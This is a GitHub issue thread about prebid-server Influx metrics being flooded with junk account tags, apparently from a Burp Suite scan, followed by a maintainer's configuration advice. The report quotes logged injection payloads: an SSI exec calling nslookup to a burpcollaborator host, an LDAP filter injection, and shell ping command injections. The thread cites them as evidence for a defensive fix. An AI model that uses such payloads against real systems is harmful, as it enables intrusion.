### ISSUE TITLE
Huge amount of different Influx tags due to external requests

### ISSUE THREAD

**Issue by derN3rd** [prebid/prebid-server#1959]
Hey there

We currently run prebid server 0.134.0 in production in combination with influx metrics.
While I was looking through high disk usage from metrics I noticed a huge amount of metric tags, which look like there has been someone scanning for security issues on our servers with Burp Suite.

Metrics that are affected are `prebidserver.account.*`, where the person tried to inject a few thousand different variables. Some examples:
- ```prebidserver.account."--&gt;'--&gt;`--&gt;&lt;!--#set var="bxy" value="aexvgteic3"--&gt;&lt;!--#set var="dz0" value="cyzxxvgte5"--&gt;&lt;!--#echo var="bxy"--&gt;&lt;!--#echo var="dz0"--&gt;&lt;!--#exec cmd="nslookup -q=cname xjki1g15zq6doq6vzmux49s2guei65x6lv.burpcollaborator.net" --&gt;.gamma.connections_created.count```
- ```prebidserver.account.y4afbnc6fz)(!(objectClass=*).gamma.connections_created.count```
- ```prebidserver.account.our-app}}q3n1o'/"&lt;ej1i7.gamma.connections_created.count```
- ```prebidserver.account.our-app|ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #" |ping -n 21 127.0.0.1.gamma.connections_created.count```

While it should only be `prebidserver.account.our-app.gamma.connections_created.count`

Looking through the changes since version 0.134.0 I could not find anything regarding validation of names or influx metrics fixes. I can't reproduce this, as I didn't do the requests, but I could provide our server configs in private.

I would classify this as a DoS, as it affected our metric system.

**Comment by SyntaxNode** [comment]
Ah, yes. Unbounded cardinality is dreadful.

I see you are specifically mentioning account adapter metrics in the form of `prebidserver.account.<account>.<bidder>.<metric>` where there are over 120 bidders (and counting) with at least 15 metrics per bidder per account. This can quickly escalate to many thousands, or even millions, of unique metrics. Yeah, that's a bit much.

We've tried to cut down on account metrics for this reason. You will notice we did not repeat this mistake in the newer Prometheus metrics collector, but we left the functionality unchanged in the Influx adapter for backwards compatibility. There is a configuration setting `metrics.disabled_metrics.account_adapter_details` which you can set to `true` to turn off account adapter metrics. Though, you'll still get account metrics for requests, bids received, and bid price. I'd be happy to add a config option to disable those too if you'd like.

Your other option is to configure Prebid Server to reject unknown accounts. This will return an error to requests with an invalid account id and also prevents the metric entries (I think. I hope).  You can set `account_defaults.disabled` to `true` to block all accounts and then specifically turn on those accounts you trust. This is done using the account fetcher which I believe can be linked to static files or an http endpoint. We don't yet have database support, but that's just because no host company has needed that yet. We welcome PRs and can provide guidance if you wish to add a database account fetcher.

I'm also open to discussing any ideas you have to address this problem.

**Comment by bretg** [comment]
Can we close this one @derN3rd ?

**Comment by derN3rd** [comment]
Yes, thanks for the help!
